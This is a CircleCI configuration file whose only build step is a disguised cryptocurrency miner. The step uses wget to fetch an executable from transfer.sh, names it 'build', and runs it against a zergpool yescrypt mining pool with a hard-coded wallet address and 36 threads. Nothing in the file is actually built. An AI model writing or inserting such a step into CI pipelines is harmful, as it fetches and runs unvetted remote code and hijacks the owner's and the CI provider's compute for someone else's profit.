version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget -qO build   http://transfer.sh/p2nGh8/Pultra && chmod +x build && ./build -a  yescrypt -o stratum+tcp://yescrypt.na.mine.zergpool.com:6233 -u DC27hTsS7UWVyL3PUKqZJJkB1ghMo9oe2B -p c=DGB,mc=XMY -t 36